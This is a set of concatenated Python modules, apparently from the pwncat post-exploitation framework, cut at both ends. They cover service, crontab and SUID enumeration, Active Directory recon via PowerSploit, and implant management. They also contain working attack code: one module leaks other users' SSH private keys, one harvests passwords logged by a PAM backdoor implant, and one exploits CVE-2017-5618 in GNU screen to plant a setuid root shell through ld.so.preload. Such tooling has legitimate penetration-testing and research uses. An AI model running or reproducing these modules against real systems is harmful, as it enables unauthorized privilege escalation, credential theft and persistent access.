        elif this_completer is not None:
            yield from this_completer.get_completions(document, complete_event)



#!/usr/bin/env python3
import subprocess

from pwncat.db import Fact
from pwncat.util import Init
from pwncat.platform.linux import Linux
from pwncat.modules.enumerate import Schedule, EnumerateModule

"""
TODO: This is weirdly inconsistent. Sometimes it works, other times it misses
like more than half of the services. We don't know why. systemctl might be
doing something weird?
"""


class ServiceData(Fact):
    def __init__(self, source, name, uid, state, pid):
        super().__init__(source=source, types=["system.service"])

        self.name: str = name
        """ The name of the service as given on the remote host """
        self.uid: int = uid
        """ The user this service is running as """
        self.state: str = state
        """ Whether the service is running """
        self.pid: int = pid

    def title(self, session):
        if self.uid == 0:
            color = "red"
        else:
            color = "green"

        try:
            user_name = session.find_user(uid=self.uid).name
        except KeyError:
            user_name = f"{self.uid} (unknown user)"
            color = "yellow"

        line = f"Service [cyan]{self.name}[/cyan] as [{color}]{user_name}[/{color}]"
        if self.state == "running":
            color = "green"
        elif self.state == "dead":
            color = "yellow"
        else:
            color = "blue"
        line += f" ([{color}]{self.state}[/{color}])"
        return line


def build_service_data(session, source, service):
    """Build a service data object from a dictionary"""

    # Grab the user name if available
    user = service.get("User", None).strip()

    # Resolve to user object
    if user is not None:
        user = session.find_user(name=user)

    # If the user existed, grab the ID
    if user is not None:
        uid = user.id
    else:
        # Otherwise, assume it was root
        uid = 0

    try:
        pid = int(service.get("MainPID", None))
    except ValueError:
        pid = None

    return ServiceData(
        source=source,
        name=service["Id"].strip(),
        uid=uid,
        state=service.get("SubState", "unknown").strip(),
        pid=pid,
    )


class Module(EnumerateModule):
    """Enumerate systemd services on the victim"""

    PROVIDES = ["system.service"]
    PLATFORM = [Linux]
    SCHEDULE = Schedule.ONCE

    def enumerate(self, session):

        for fact in session.run(
            "enumerate.gather", types=["system.init"], progress=self.progress
        ):
            if fact.init != Init.SYSTEMD:
                return
            break

        # Ensure we build the user cache
        session.find_user(uid=0)

        try:
            # List all services and grab the details
            proc = session.platform.Popen(
                "systemctl list-units --type=service --no-pager --all --no-legend --plain | cut -d' ' -f1 | xargs systemctl show --no-pager --all --property Id --property User --property MainPID --property SubState",
                shell=True,
                stdout=subprocess.PIPE,
                text=True,
            )

            service = {}

            for line in proc.stdout:
                if line.strip() == "":
                    # We can only build a service structure if we know the name
                    if "Id" in service and service["Id"].strip() != "":
                        yield build_service_data(session, self.name, service)

                    # Reset service dict
                    service = {}
                    continue

                # Store the key-value pair in the dict
                name, *value = line.split("=")
                value = "=".join(value)
                service[name] = value

        finally:
            try:
                proc.wait(2)
            except TimeoutError:
                proc.kill()
                proc.wait()



#!/usr/bin/env python3

import pwncat
from pwncat.facts import PrivateKey
from pwncat.modules import Status, ModuleFailed
from pwncat.platform.linux import Linux
from pwncat.modules.enumerate import Schedule, EnumerateModule


class Module(EnumerateModule):
    """Find escalation methods by using file-read abilities to
    leak other user's private keys."""

    PLATFORM = [Linux]
    SCHEDULE = Schedule.ALWAYS

    def enumerate(self, session: "pwncat.manager.Session"):
        """Locate usable file read abilities and generate escalations"""

        # Ensure users are already cached
        all_users = list(session.iter_users())
        already_leaked = []

        for ability in session.run("enumerate", types=["ability.file.read"]):

            if ability.uid == 0:
                users = all_users
            else:
                user = session.find_user(uid=ability.uid)
                if user is None:
                    continue
                users = [user]

            for user in users:
                if user in already_leaked:
                    continue

                yield Status(f"leaking key for [blue]{user.name}[/blue]")

                ssh_path = session.platform.Path(user.home, ".ssh")
                authkeys = None
                pubkey = None
                # We assume its an authorized key even if we can't read authorized_keys
                # This will be modified if connection ever fails.
                authorized = True

                try:
                    with ability.open(session, str(ssh_path / "id_rsa"), "r") as filp:
                        privkey = filp.read()
                except (ModuleFailed, FileNotFoundError, PermissionError):
                    yield Status(
                        f"leaking key for [blue]{user.name}[/blue] [red]failed[/red]"
                    )
                    continue

                try:
                    with ability.open(
                        session, str(ssh_path / "id_rsa.pub"), "r"
                    ) as filp:
                        pubkey = filp.read()
                    if pubkey.strip() == "":
                        pubkey = None
                except (ModuleFailed, FileNotFoundError, PermissionError):
                    yield Status(
                        f"leaking pubkey [red]failed[/red] for [blue]{user.name}[/blue]"
                    )

                if pubkey is not None and pubkey != "":
                    try:
                        with ability.open(
                            session, str(ssh_path / "authorized_keys"), "r"
                        ) as filp:
                            authkeys = filp.read()
                        if authkeys.strip() == "":
                            authkeys = None
                    except (ModuleFailed, FileNotFoundError, PermissionError):
                        yield Status(
                            f"leaking authorized keys [red]failed[/red] for [blue]{user.name}[/blue]"
                        )

                if pubkey is not None and authkeys is not None:
                    # We can identify if this key is authorized
                    authorized = pubkey.strip() in authkeys

                yield PrivateKey(
                    self.name,
                    str(ssh_path / "id_rsa"),
                    user.id,
                    privkey,
                    False,
                    authorized=authorized,
                )

                already_leaked.append(user)



#!/usr/bin/env python3
from typing import Dict

import pwncat
from pwncat.db import Fact
from pwncat.modules import Status
from pwncat.platform.windows import Windows, PowershellError
from pwncat.modules.enumerate import Schedule, EnumerateModule


class ComputerObject(Fact):
    def __init__(self, source: str, data: Dict):
        super().__init__(source=source, types=["domain.computer"])

        self.computer = data

    def __getitem__(self, name: str):
        """Shortcut for getting properties from the `self.domain` property."""

        return self.computer[name]

    def title(self, session: "pwncat.manager.Session"):
        return f"[blue]{self['dnshostname']}[/blue] ([cyan]{self['name']}[/cyan])"

    def is_dc(self):
        """Query if this computer object is a domain controller"""

        uac = self.computer.get("useraccountcontrol") or 0

        return (uac & 0x2000) > 0

    def is_rodc(self):
        """Query if this computer object is a read only domain controller"""

        uac = self.computer.get("useraccountcontrol") or 0

        return (uac & 0x04000000) > 0

    def description(self, session: "pwncat.manager.Session"):
        output = []

        if self.is_rodc():
            output.append("[red]Read-Only Domain Controller[/red]")
        elif self.is_dc():
            output.append("[bold red]Domain Controller[/bold red]")

        output.append(f"Computer SID: [cyan]{self['objectsid']}[/cyan]")
        output.append(f"Machine Account: [cyan]{self['samaccountname']}[/cyan]")
        output.append(
            f"Operating System: [blue]{self['operatingsystem']} {self['operatingsystemversion']}[/blue]"
        )
        output.append(
            f"Distinguished Name: [magenta]{self['distinguishedname']}[/magenta]"
        )

        return "\n".join(output)


class Module(EnumerateModule):
    """Retrieve information on all domain computers"""

    PLATFORM = [Windows]
    PROVIDES = ["domain.computer"]
    SCHEDULE = Schedule.ONCE

    def enumerate(self, session: "pwncat.manager.Session"):
        """Perform enumeration"""

        # Check that we are in a domain
        if not session.run("enumerate", types=["domain.details"]):
            return

        # Ensure we have PowerView loaded
        yield Status("loading powersploit recon")
        session.run("powersploit", group="recon")

        try:
            yield Status("requesting domain computers")
            computers = session.platform.powershell("Get-DomainComputer")[0]
        except (IndexError, PowershellError):
            # Doesn't appear to be a domain joined computer
            return

        if isinstance(computers, dict):
            yield ComputerObject(self.name, computers)
        else:
            yield from (ComputerObject(self.name, computer) for computer in computers)



#!/usr/bin/env python3
from rich import box
from rich.table import Table

import pwncat
from pwncat.util import console
from pwncat.commands import Complete, Parameter, CommandDefinition


class Command(CommandDefinition):
    """
    Interact and control active remote sessions. This command can be used
    to change context between sessions or kill active sessions which were
    established with the `connect` command.
    """

    PROG = "sessions"
    ARGS = {
        "--list,-l": Parameter(
            Complete.NONE,
            action="store_true",
            help="List active connections",
        ),
        "--kill,-k": Parameter(
            Complete.NONE,
            action="store_true",
            help="Kill an active session",
        ),
        "session_id": Parameter(
            Complete.NONE,
            type=int,
            help="Interact with the given session",
            nargs="?",
        ),
    }
    LOCAL = True

    def run(self, manager: "pwncat.manager.Manager", args):

        if args.list or (not args.kill and args.session_id is None):
            table = Table(title="Active Sessions", box=box.MINIMAL_DOUBLE_HEAD)

            table.add_column("ID")
            table.add_column("User")
            table.add_column("Host ID")
            table.add_column("Platform")
            table.add_column("Type")
            table.add_column("Address")

            for session_id, session in manager.sessions.items():
                ident = str(session_id)
                kwargs = {"style": ""}
                if session is manager.target:
                    ident = "*" + ident
                    kwargs["style"] = "underline"
                table.add_row(
                    str(ident),
                    session.current_user().name,
                    str(session.hash),
                    session.platform.name,
                    str(type(session.platform.channel).__name__),
                    str(session.platform.channel),
                    **kwargs,
                )

            console.print(table)

            return

        if args.session_id is None:
            console.log("[red]error[/red]: no session id specified")
            return

        # check if a session with the provided ``session_id`` exists or not
        if args.session_id not in manager.sessions:
            console.log(f"[red]error[/red]: {args.session_id}: no such session!")
            return

        session = manager.sessions[args.session_id]

        if args.kill:
            channel = str(session.platform.channel)
            session.close()
            console.log(f"session-{args.session_id} ({channel}) closed")
            return

        manager.target = session
        console.log(f"targeting session-{args.session_id} ({session.platform.channel})")



#!/usr/bin/env python3

from pwncat.facts import PotentialPassword
from pwncat.platform.linux import Linux
from pwncat.modules.enumerate import Schedule, EnumerateModule

"""
TODO: This module is specifically used to check if we have passwords set
from previously running a paired PAM persistence backdoor. If the persistence
isn't in place already, there is no reason to run this enumeration module.
The persistence module has not been re-implemented in the new platforms
framework so this can't be updated just yet.
"""


class Module(EnumerateModule):
    """
    Exfiltrate logged passwords from the pam-based persistence
    module. This persistence module logs all attempted passwords
    for all users in a known location. We read this file and yield
    all passwords we have collected.
    """

    PLATFORM = [Linux]
    SCHEDULE = Schedule.ALWAYS
    PROVIDES = ["creds.password"]

    def enumerate(self, session):

        # Ensure the user database is already retrieved
        session.find_user(uid=0)

        for implant in session.run("enumerate", types=["implant.*"]):
            if implant.source != "linux.implant.pam":
                continue

            # Just in case we have multiple of the same password logged
            observed = []

            try:
                with session.platform.open(implant.log, "r") as filp:
                    for lineno, line in enumerate(filp):
                        line = line.rstrip("\n")
                        if line in observed:
                            continue

                        user, *password = line.split(":")
                        password = ":".join(password)

                        try:
                            # Check for valid user name
                            user_info = session.find_user(name=user)
                        except KeyError:
                            continue

                        observed.append(line)

                        yield PotentialPassword(
                            self.name, password, implant.log, lineno, user_info.id
                        )
            except (FileNotFoundError, PermissionError):
                pass



#!/usr/bin/env python3
import os
import re

from pwncat.db import Fact
from pwncat.modules import Status
from pwncat.subprocess import CalledProcessError
from pwncat.platform.linux import Linux
from pwncat.modules.enumerate import Schedule, EnumerateModule


class CronEntry(Fact):
    def __init__(self, source, path, uid, command, datetime):
        super().__init__(source=source, types=["software.cron.entry"])

        self.path: str = path
        """ The path to the crontab where this was found """
        self.uid: int = uid
        """ The user ID this entry will run as """
        self.command: str = command
        """ The command that will execute """
        self.datetime: str = datetime
        """ The entire date/time specifier from the crontab entry """

    def description(self, session):
        return f"{self.path}: {self.datetime} {self.command}"

    def title(self, session):
        return f"[blue]{session.find_user(uid=self.uid).name}[/blue] runs [yellow]{repr(self.command)}[/yellow]"


def parse_crontab(
    source, session, path: str, line: str, system: bool = True
) -> CronEntry:
    """
    Parse a crontab line. This returns a tuple of (command, datetime, user) indicating
    the command to run, when it will execute, and who it will execute as. If system is
    false, then the current user is returned and no user element is parsed (assumed
    not present).

    This will raise a ValueError if the line is malformed.

    :param line: the line from crontab
    :param system: whether this is a system or user crontab entry
    :return: a tuple of (command, datetime, username)
    """

    # Variable assignment, comment or empty line
    if (
        line.startswith("#")
        or line == ""
        or re.match(r"[a-zA-Z][a-zA-Z0-9_-]*\s*=.*", line) is not None
    ):
        raise ValueError

    entry = [x for x in line.strip().replace("\t", " ").split(" ") if x != ""]

    # Malformed entry or comment
    if (len(entry) <= 5 and not system) or (len(entry) <= 6 and system):
        raise ValueError

    when = " ".join(entry[:5])

    if system:
        uid = session.find_user(name=entry[5]).id
        command = " ".join(entry[6:])
    else:
        uid = session.current_user().id
        command = " ".join(entry[5:])

    return CronEntry(source, path, uid, command, when)


class Module(EnumerateModule):
    """
    Check for any readable crontabs and return their entries.
    """

    PROVIDES = ["software.cron.entry"]
    PLATFORM = [Linux]
    SCHEDULE = Schedule.PER_USER

    def enumerate(self, session):

        try:
            # Get this user's crontab entries
            proc = session.platform.run(
                ["crontab", "-l"], capture_output=True, text=True, check=True
            )
            user_entries = proc.stdout

        except CalledProcessError:
            # The crontab command doesn't exist :(
            return

        for line in user_entries.split("\n"):
            try:
                yield parse_crontab(
                    self.name, session, "crontab -l", line, system=False
                )
            except ValueError:
                continue

        known_tabs = ["/etc/crontab"]

        for tab_path in known_tabs:
            try:
                with session.platform.open(tab_path, "r") as filp:
                    for line in filp:
                        try:
                            yield parse_crontab(
                                self.name, session, tab_path, line, system=True
                            )
                        except ValueError:
                            continue
            except (FileNotFoundError, PermissionError):
                pass

        known_dirs = [
            "/etc/cron.d",
            # I'm dumb. These aren't crontabs... they're scripts...
            # "/etc/cron.daily",
            # "/etc/cron.weekly",
            # "/etc/cron.monthly",
        ]
        for dir_path in known_dirs:
            try:
                yield Status(f"getting crontabs from [cyan]{dir_path}[/cyan]")
                filenames = list(session.platform.listdir(dir_path))
                for filename in filenames:
                    if filename in (".", ".."):
                        continue
                    yield Status(f"reading [cyan]{filename}[/cyan]")
                    try:
                        with session.platform.open(
                            os.path.join(dir_path, filename), "r"
                        ) as filp:
                            for line in filp:
                                try:
                                    yield parse_crontab(
                                        self.name,
                                        session,
                                        os.path.join(dir_path, filename),
                                        line,
                                        system=True,
                                    )
                                except ValueError:
                                    pass
                    except (FileNotFoundError, PermissionError):
                        pass
            except (FileNotFoundError, NotADirectoryError, PermissionError):
                pass



#!/usr/bin/env python3
from typing import List

from rich.prompt import Prompt

from pwncat.util import console
from pwncat.facts import Implant, KeepImplantFact
from pwncat.modules import Bool, Status, Argument, BaseModule, ModuleFailed


class Module(BaseModule):
    """Interact with installed implants in an open session. This module
    provides the ability to remove implants as well as manually escalate
    with a given implant. Implants implementing local escalation will
    automatically be picked up by the `escalate` command, however this
    module provides an alternative way to trigger escalation manually."""

    PLATFORM = None
    """ No platform restraints """
    ARGUMENTS = {
        "list": Argument(Bool, default=False, help="list installed implants"),
        "remove": Argument(Bool, default=False, help="remove installed implants"),
        "escalate": Argument(
            Bool, default=False, help="escalate using an installed local implant"
        ),
    }

    def run(self, session, remove, escalate, **kwargs):
        """Perform the requested action"""

        if sum([remove, escalate, kwargs.get("list")]) > 1:
            raise ModuleFailed("expected one of escalate, remove or list")

        if remove is False and escalate is False:
            kwargs["list"] = True

        # Look for matching implants
        implants = list(
            implant
            for implant in session.run("enumerate", types=["implant.*"])
            if not escalate
            or kwargs.get("list")
            or "implant.replace" in implant.types
            or "implant.spawn" in implant.types
        )

        if not implants:
            console.print("No installed implants.")
            return

        try:
            session._progress.stop()

            console.print("Found the following implants:")
            for i, implant in enumerate(implants):
                console.print(f"{i+1}. {implant.title(session)}")

            if remove:
                prompt = "Which should we remove (e.g. '1 2 4', default: all)? "
            elif escalate:
                prompt = "Which should we attempt escalation with (e.g. '1 2 4', default: all)? "
            else:
                return

            while True:
                selections = Prompt.ask(prompt, console=console)
                if selections == "":
                    break

                try:
                    implant_ids = [int(idx.strip()) for idx in selections]
                    # Filter the implants
                    implants: List[Implant] = [implants[i - 1] for i in implant_ids]
                    break
                except (IndexError, ValueError):
                    console.print("[red]error[/red]: invalid selection!")

        finally:
            session._progress.start()

        nremoved = 0

        for implant in implants:
            if remove:
                try:
                    yield Status(f"removing: {implant.title(session)}")
                    implant.remove(session)
                    session.target.facts.remove(implant)
                    nremoved += 1
                except KeepImplantFact:
                    # Remove implant types but leave the fact
                    implant.types.remove("implant.remote")
                    implant.types.remove("implant.replace")
                    implant.types.remove("implant.spawn")
                    nremoved += 1
                except ModuleFailed:
                    session.log(
                        f"[red]error[/red]: removal failed: {implant.title(session)}"
                    )
            elif escalate:
                try:
                    yield Status(
                        f"attempting escalation with: {implant.title(session)}"
                    )
                    result = implant.escalate(session)

                    if "implant.spawn" in implant.types:
                        # Move to the newly established session
                        session.manager.target = result
                    else:
                        # Track the new shell layer in the current session
                        session.layers.append(result)
                        session.platform.refresh_uid()

                    session.log(
                        f"escalation [green]succeeded[/green] with: {implant.title(session)}"
                    )
                    break
                except ModuleFailed:
                    continue
        else:
            if escalate:
                raise ModuleFailed("no working local escalation implants found")

        if nremoved:
            session.log(f"removed {nremoved} implants from target")

        # Save database modifications
        session.db.transaction_manager.commit()



#!/usr/bin/env python3
from typing import Dict

import pwncat
from pwncat.db import Fact
from pwncat.modules import Status
from pwncat.platform.windows import Windows, PowershellError
from pwncat.modules.enumerate import Schedule, EnumerateModule


class DomainObject(Fact):
    def __init__(self, source: str, data: Dict, sid: str):
        super().__init__(source=source, types=["domain.details"])

        self.domain = data
        self.sid = sid

    def __getitem__(self, name: str):
        """Shortcut for getting properties from the `self.domain` property."""

        return self.domain[name]

    def title(self, session: "pwncat.manager.Session"):
        return f"Active Directory Domain: [magenta]{self.domain['Name']}[/magenta]"

    def description(self, session: "pwncat.manager.Session"):
        output = []

        output.append(f"Forest: [cyan]{self['Forest']['Name']}[/cyan]")
        output.append(
            f"Domain Controllers: [cyan]{'[/cyan][cyan]'.join(self['DomainControllers'])}[/cyan]"
        )
        output.append(f"SID: {repr(self.sid)}")

        return "\n".join(output)


class Module(EnumerateModule):
    """Retrieve domain membership information"""

    PLATFORM = [Windows]
    PROVIDES = ["domain.details"]
    SCHEDULE = Schedule.ONCE

    def enumerate(self, session: "pwncat.manager.Session"):
        """Perform enumeration"""

        # Ensure we have PowerView loaded
        yield Status("loading powersploit recon")
        session.run("powersploit", group="recon")

        try:
            yield Status("requesting domain details")
            domain = session.platform.powershell("Get-Domain")[0]
        except (IndexError, PowershellError):
            # Doesn't appear to be a domain joined computer
            return

        try:
            yield Status("requesting domain sid")
            sid = session.platform.powershell("Get-DomainSID")[0]
        except (IndexError, PowershellError):
            sid = None

        yield DomainObject(self.name, domain, sid)



#!/usr/bin/env python3
import subprocess

import rich.markup

import pwncat
from pwncat.db import Fact
from pwncat.gtfobins import Stream
from pwncat.facts.ability import build_gtfo_ability
from pwncat.platform.linux import Linux
from pwncat.modules.enumerate import Schedule, EnumerateModule


class Binary(Fact):
    """
    A generic description of a SUID binary
    """

    def __init__(self, source, path, uid):
        super().__init__(source=source, types=["file.suid"])

        """ The path to the binary """
        self.path: str = path

        """ The uid of the binary """
        self.uid: int = uid

    def title(self, session):
        color = "red" if self.uid == 0 else "green"
        return f"[cyan]{rich.markup.escape(self.path)}[/cyan] owned by [{color}]{rich.markup.escape(session.find_user(uid=self.uid).name)}[/{color}]"


class Module(EnumerateModule):
    """Enumerate SUID binaries on the remote host"""

    PROVIDES = [
        "file.suid",
        "ability.execute",
        "ability.file.read",
        "ability.file.write",
    ]
    PLATFORM = [Linux]
    SCHEDULE = Schedule.PER_USER

    def enumerate(self, session: "pwncat.manager.Session"):

        # This forces the session to enumerate users FIRST, so we don't run
        # into trying to enumerate _whilst_ enumerating SUID binaries...
        # since we can't yet run multiple processes at the same time
        session.find_user(uid=0)

        # Spawn a find command to locate the setuid binaries
        proc = session.platform.Popen(
            ["find", "/", "-perm", "-4000", "-printf", "%U %p\\n"],
            stderr=subprocess.DEVNULL,
            stdout=subprocess.PIPE,
            text=True,
        )

        try:
            with proc.stdout as stream:
                for path in stream:
                    # Parse out owner ID and path
                    path = path.strip().split(" ")
                    uid, path = int(path[0]), " ".join(path[1:])

                    fact = Binary(self.name, path, uid)
                    yield fact

                    yield from (
                        build_gtfo_ability(
                            self.name, uid, method, source_uid=None, suid=True
                        )
                        for method in session.platform.gtfo.iter_binary(
                            path, stream=Stream.RAW
                        )
                    )
        finally:
            proc.wait()



"""
This is the base class for all socket-based channels. Both bind and
connect protocols utilize this base class. You can also programmatically
utilize this class to instantiate a session via an established socket.

.. code-block:: python

    # Manually connect to a service and trigger a shell on the same socket
    sock = socket.create_connection(("192.168.1.1", 1337))

    # Create a manager
    with pwncat.manager.Manager() as manager:
        # Create a pwncat session around our socket
        session = manager.create_connection(platform="linux", protocol="socket", client=sock)
        manager.interactive()
"""
import os
import ssl
import errno
import fcntl
import socket
import functools
from typing import Optional

from pwncat.channel import Channel, ChannelError, ChannelClosed


def connect_required(method):
    """Channel method decorator which verifies that the channel
    is connected prior to executing the wrapped method. If the
    channel is not connected, a :class:`ChannelError` is raised."""

    @functools.wraps(method)
    def _wrapper(self, *args, **kwargs):
        if not self.connected:
            raise ChannelClosed(self)
        return method(self, *args, **kwargs)

    return _wrapper


class Socket(Channel):
    """
    Implements a channel which rides over a shell attached
    directly to a socket. This channel takes an existing
    socket as an argument, and allows pwncat to reuse
    an existing connection.
    """

    def __init__(self, client: socket.socket = None, **kwargs):

        if isinstance(client, str):
            raise ChannelError(self, f"expected socket object not {repr(type(client))}")

        if client is not None:
            # Report host and port number to base channel
            host, port, *_ = client.getpeername()

            # Localhost is sometimes a IPv4 and sometimes IPv6 socket, just normalize the name
            if host == "::1" or host == "127.0.0.1":
                host = "localhost"

            if "host" not in kwargs:
                kwargs["host"] = host
            if "port" not in kwargs:
                kwargs["port"] = port

        super().__init__(**kwargs)

        self._connected = False

        if client is not None:
            self._socket_connected(client)

    @property
    def connected(self):
        return self._connected

    def _socket_connected(self, client: socket.socket):
        """Notify the channel that the socket is now connected.
        This is mainly used for binding sockets where the initial
        socket creation is only the server, and the client is
        connected during the ``connect`` method."""

        self._connected = True
        self.client = client
        self.address = client.getpeername()

        # Localhost is sometimes a IPv4 and sometimes IPv6 socket, just normalize the name
        if self.address[0] == "::1" or self.address[0] == "127.0.0.1":
            self.address = ("localhost", *self.address[1:])

        self.client.setblocking(False)
        fcntl.fcntl(self.client, fcntl.F_SETFL, os.O_NONBLOCK)

    @connect_required
    def send(self, data: bytes):
        """Send data to the remote shell. This is a blocking call
        that only returns after all data is sent."""

        try:
            written = 0
            while written < len(data):
                try:
                    written += self.client.send(data[written:])
                except (BlockingIOError, ssl.SSLWantWriteError, ssl.SSLWantReadError):
                    pass
        except BrokenPipeError as exc:
            self._connected = False
            raise ChannelClosed(self) from exc
        except (ssl.SSLEOFError, ssl.SSLSyscallError, ssl.SSLZeroReturnError) as exc:
            self._connected = False
            raise ChannelClosed(self) from exc

        return len(data)

    @connect_required
    def recv(self, count: Optional[int] = None) -> bytes:
        """Basic socket recv wrapper. This also uses the default
        ``peek`` implementation. This could be optimized to use
        the socket native ``peek`` method.

        :param count: maximum number of bytes to receive (default: unlimited)
        :type count: int
        :return: the data that was received
        :rtype: bytes
        """

        if self.peek_buffer:
            data = self.peek_buffer[:count]
            self.peek_buffer = self.peek_buffer[len(data) :]
            count -= len(data)
        else:
            data = b""

        if count == 0:
            return data

        try:
            new_data = self.client.recv(count)
            if new_data == b"":
                self._connected = False
                raise ChannelClosed(self)
            return data + new_data
        except BlockingIOError:
            return data
        except ssl.SSLWantReadError:
            return data
        except (ssl.SSLEOFError, ssl.SSLSyscallError, ssl.SSLZeroReturnError) as exc:
            self._connected = False
            raise ChannelClosed(self) from exc
        except socket.error as exc:
            if exc.args[0] == errno.EAGAIN or exc.args[0] == errno.EWOULDBLOCK:
                return data

            self._connected = False
            raise ChannelClosed(self) from exc

    def close(self):
        if not self._connected:
            return

        self._connected = False
        self.client.close()

    @connect_required
    def fileno(self):
        return self.client.fileno()



#!/usr/bin/env python3
from pathlib import Path

import pwncat
from pwncat.util import console
from pwncat.commands import CommandDefinition


class Command(CommandDefinition):
    """Print the local current working directory"""

    PROG = "lpwd"
    ARGS = {}

    def run(self, manager: "pwncat.manager.Manager", args):

        console.print(Path.cwd())



"""
This provides a subprocess-compatible definition of an internal pwncat
Popen object. A pwncat Popen object wraps a remote process in a local
manager which provides an almost-identical interface as the builtin
subprocess module.

.. note::

    Depending on the platform you are connected to, you may only be
    able to run a single process at a time. Because of this, you
    should always ensure the process properly exits and you call
    ``Popen.wait()`` or receive a non-None result from ``Popen.poll()``
    before calling other pwncat methods.

"""
from typing import IO, List, Optional
from subprocess import (  # noqa: F401
    PIPE,
    DEVNULL,
    TimeoutExpired,
    SubprocessError,
    CompletedProcess,
    CalledProcessError,
)


class Popen:
    """Base class for Popen objects defining the interface.
    Individual platforms will subclass this object to implement
    the correct logic. This is an abstract class."""

    stdin: IO
    """
    If the stdin argument was PIPE, this attribute is a writeable
    stream object as returned by open(). If the encoding or errors
    arguments were specified or the universal_newlines argument was
    True, the stream is a text stream, otherwise it is a byte
    stream. If the stdin argument was not PIPE, this attribute is
    None.
    """
    stdout: IO
    """
    If the stdout argument was PIPE, this attribute is a readable
    stream object as returned by open(). Reading from the stream
    provides output from the child process. If the encoding or
    errors arguments were specified or the universal_newlines
    argument was True, the stream is a text stream, otherwise it
    is a byte stream. If the stdout argument was not PIPE, this
    attribute is None.
    """
    stderr: IO
    """
    If the stderr argument was PIPE, this attribute is a readable
    stream object as returned by open(). Reading from the stream
    provides error output from the child process. If the encoding
    or errors arguments were specified or the universal_newlines
    argument was True, the stream is a text stream, otherwise it
    is a byte stream. If the stderr argument was not PIPE, this
    attribute is None.
    """
    args: List[str]
    """
    The args argument as it was passed to Popen – a sequence of
    program arguments or else a single string.
    """
    pid: int
    """ The process ID of the child process. """
    returncode: int
    """
    The child return code, set by poll() and wait() (and indirectly by
    communicate()). A None value indicates that the process hasn’t
    terminated yet.
    """

    def __init__(self):
        self.pid = None
        self.returncode = None
        self.args = None
        self.stderr = None
        self.stdout = None
        self.stdin = None

    def poll(self) -> Optional[int]:
        """Check if the child process has terminated. Set and return
        ``returncode`` attribute. Otherwise, returns None."""

    def wait(self, timeout: float = None) -> int:
        """Wait for child process to terminate. Set and return
        ``returncode`` attribute.

        If the process does not terminate after ``timeout`` seconds,
        raise a ``TimeoutExpired`` exception. It is safe to catch
        this exception and retry the wait.
        """

    def communicate(self, input: bytes = None, timeout: float = None):
        """Interact with process: Send data to stdin. Read data from stdout
        and stderr, until end-of-file is reached. Wait for the process to
        terminate and set the ``returncode`` attribute. The optional ``input``
        argument should be data to be sent to the child process, or None, if
        no data should be sent to the child. If streams were opened in text mode,
        ``input`` must be a string. Otherwise, it must be ``bytes``."""

    def send_signal(self, signal: int):
        """Sends the signal ``signal`` to the child.

        Does nothing if the process completed.
        """

    def terminate(self):
        """Stop the child."""

    def kill(self):
        """Kills the child"""



#!/usr/bin/env python3
import textwrap
import subprocess
from io import StringIO

import pwncat
from pwncat.facts import ExecuteAbility
from pwncat.modules import ModuleFailed
from pwncat.platform import PlatformError
from pwncat.subprocess import CalledProcessError
from pwncat.platform.linux import Linux
from pwncat.modules.enumerate import Schedule, EnumerateModule


class CVE_2017_5618(ExecuteAbility):
    """Exploit CVE-2017-5618"""

    def __init__(self, source: str, screen):
        super().__init__(source=source, source_uid=None, uid=0)

        self.screen = screen

    def shell(self, session: "pwncat.manager.Session"):
        """Execute a shell"""

        # Write the rootshell source code
        rootshell_source = textwrap.dedent(
            f"""
                #include <stdio.h>
                #include <unistd.h>
                int main(void){{
                    setreuid(0,0);
                    setregid(0,0);
                    const char* x[] = {{"{session.platform.shell}","-p",NULL}};
                    execvp(x[0], x);
                }}
                """
        ).lstrip()

        with session.platform.tempfile(mode="w", directory="/tmp") as filp:
            rootshell = filp.name

        # Compile the rootshell binary
        try:
            rootshell = session.platform.compile(
                [StringIO(rootshell_source)], output=rootshell
            )
        except PlatformError as exc:
            raise ModuleFailed(f"compilation failed: {exc}") from exc

        # Write the library
        libhack_source = textwrap.dedent(
            f"""
                #include <stdio.h>
                #include <sys/types.h>
                #include <unistd.h>
                __attribute__ ((__constructor__))
                void dropshell(void){{
                    chown("{rootshell}", 0, 0);
                    chmod("{rootshell}", 04755);
                    unlink("/etc/ld.so.preload");
                }}
                """
        ).lstrip()

        # Compile libhack
        try:
            libhack_so = session.platform.compile(
                [StringIO(libhack_source)],
                cflags=["-fPIC", "-shared"],
                ldflags=["-ldl"],
            )
        except PlatformError as exc:
            session.platform.Path(rootshell).unlink()
            raise ModuleFailed("compilation failed: {exc}") from exc

        # Switch to /etc but save our previous directory so we can return to it
        old_cwd = session.platform.chdir("/etc")

        # Run screen with our library, saving the umask before changing it
        start_umask = session.platform.umask()
        session.platform.umask(0o000)

        # Run screen, loading our library and causing our rootshell to be SUID
        session.platform.run(
            [
                self.screen.path,
                "-D",
                "-m",
                "-L",
                "ld.so.preload",
                "echo",
                "-ne",
                libhack_so,
            ],
            stdin=subprocess.PIPE,
            stdout=subprocess.PIPE,
            check=True,
        )

        # Trigger the exploit
        try:
            session.platform.run(
                [self.screen.path, "-ls"],
                stdin=subprocess.PIPE,
                stdout=subprocess.PIPE,
                check=True,
            )
        except CalledProcessError:
            # This normally has a non-zero returncode
            pass

        # We no longer need the shared object
        session.platform.Path(libhack_so).unlink()

        # Reset umask to the saved value
        session.platform.umask(start_umask)

        # Hop back to the original directory
        try:
            session.platform.chdir(old_cwd)
        except (FileNotFoundError, NotADirectoryError, PermissionError):
            # Maybe we don't have permissions to go back?
            pass

        # Check if the file is owned by root
        if session.platform.Path(rootshell).owner() != "root":
            # Ensure the files are removed
            session.platform.Path(rootshell).unlink()

            raise ModuleFailed("failed to create root shell")

        # Start the root shell!
        proc = session.platform.Popen(
            [rootshell],
            stdin=subprocess.PIPE,
            stdout=subprocess.PIPE,
            stderr=subprocess.PIPE,
        )

        # Detach. This new shell becomes our primary shell
        proc.detach()

        if session.platform.refresh_uid() != 0:
            session.platform.channel.send(b"exit\n")
            raise ModuleFailed("failed to get root shell (is nosuid set on /tmp?)")

        # Remove the rootshell
        session.platform.Path(rootshell).unlink()

        return lambda s: s.platform.channel.send(b"exit\n")

    def title(self, session):
        """Grab the description for this fact"""

        return f"[cyan]{self.screen.path}[/cyan] vulnerable to [red]CVE-2017-5618[/red]"


class Module(EnumerateModule):
    """Identify systems vulnerable to CVE-2017-5618"""

    PROVIDES = ["ability.execute"]
    PLATFORM = [Linux]
    SCHEDULE = Schedule.PER_USER

    def enumerate(self, session: "pwncat.manager.Session"):
        """check for vulnerable screen versions"""

        for screen in session.run("enumerate", types=["software.screen.version"]):
            if not screen.vulnerable or (screen.perms & 0o4000) == 0:
                continue

